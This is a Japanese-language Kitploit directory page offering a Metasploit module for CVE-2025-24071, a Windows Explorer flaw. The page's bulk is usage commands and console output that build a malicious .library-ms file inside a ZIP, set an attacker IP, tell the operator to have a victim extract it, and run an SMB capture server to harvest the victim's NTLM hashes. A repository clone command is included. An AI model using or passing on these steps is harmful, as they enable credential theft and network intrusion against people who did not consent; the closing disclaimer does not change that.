Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Blackash-CVE-2025-24071 — CVE-2025-24071 | Kitploit
ツール/GitHubGitHub/zbs54/blackash-cve-2025-24071
エクスプロイトフレームワークペイロード生成脆弱性分析エクスプロイト情報収集ペネトレーションテスト
GitHubzbs54/blackash-cve-2025-24071

Blackash-CVE-2025-24071

CVE-2025-24071

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Blackash-CVE-2025-24071

CVE-2025-24071: .library-ms ファイルによる NTLM ハッシュ漏洩、Metasploit モジュール 🚨

説明

Windows ファイルエクスプローラーにおいて、権限のないアクターへの機密情報の露出により、権限のない攻撃者がネットワーク上でスプーフィングを実行できるようになります。

メトリクス

CNA: Microsoft Corporation 基本スコア: 6.5 MEDIUM 🟠 ベクター: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

概要

この脆弱性は、ユーザーが特別に細工された .library-ms ファイルを含む ZIP アーカイブを展開したときに発生します。Windows エクスプローラーは、ファイル内で指定されたリモートサーバーへの SMB 認証要求を自動的に開始し、ユーザーの操作なしでユーザーの NTLM ハッシュを漏えいさせます。

この Metasploit モジュールは:

  1. 悪意のある .library-ms ファイルを生成します。
  2. それを ZIP アーカイブにパッケージ化します。
  3. Metasploit の SMB キャプチャ機能と統合して NTLM ハッシュを収集します。
root@kitploit:~
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        https://metasploit.com


       =[ metasploit v6.4.64-dev                          ]
+ -- --=[ 2519 exploits - 1296 auxiliary - 431 post       ]
+ -- --=[ 1616 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > use auxiliary/server/ntlm_hash_leak
msf6 auxiliary(server/ntlm_hash_leak) > set ATTACKER_IP 192.168.1.1
ATTACKER_IP => 192.168.1.1
msf6 auxiliary(server/ntlm_hash_leak) > set FILNAME exploit.zip
FILNAME => exploit.zip
msf6 auxiliary(server/ntlm_hash_leak) > set LIBRARY_NAME malicious.library-ms
LIBRARY_NAME => malicious.library-ms
msf6 auxiliary(server/ntlm_hash_leak) > set SHARE_NAME shared
set SHARE_NAME => shared
msf6 auxiliary(server/ntlm_hash_leak) > run
[*] Malicious ZIP file created: exploit.zip
[*] Host the file and wait for the victim to extract it.
[*] Ensure you have an SMB capture server running to collect NTLM hashes.
[*] Auxiliary module execution completed

インストール:

  1. リポジトリをクローンします:
root@kitploit:~
git clone https://github.com/B1ack4sh/Blackash-CVE-2025-24071.git
cd CVE-2025-24071

使用方法:

  1. モジュールをロードします:
root@kitploit:~
use auxiliary/server/ntlm_hash_leak
  1. 必要なオプションを設定します:
root@kitploit:~
set ATTACKER_IP 192.168.1.162           # Replace with your IP address
set FILENAME exploit.zip                # Name of the malicious ZIP file
set LIBRARY_NAME malicious.library-ms   # Name of the .library-ms file
set SHARE_NAME shared                   # SMB share name
  1. モジュールを実行します :
root@kitploit:~
run
  1. モジュールは悪意のある ZIP ファイル (exploit.zip) を生成します。このファイルをホストして、被害者にダウンロードおよび展開させます。
  2. Metasploit の SMB キャプチャモジュールを使用して NTLM ハッシュを収集します:
root@kitploit:~
use auxiliary/server/capture/smb
set SRVHOST 192.168.1.162  # Same as ATTACKER_IP
run

免責事項 ⚠️

教育および研究目的のみに使用してください。所有しているシステム、またはテストする許可を得たシステムに対してのみ使用してください。

ツールをダウンロード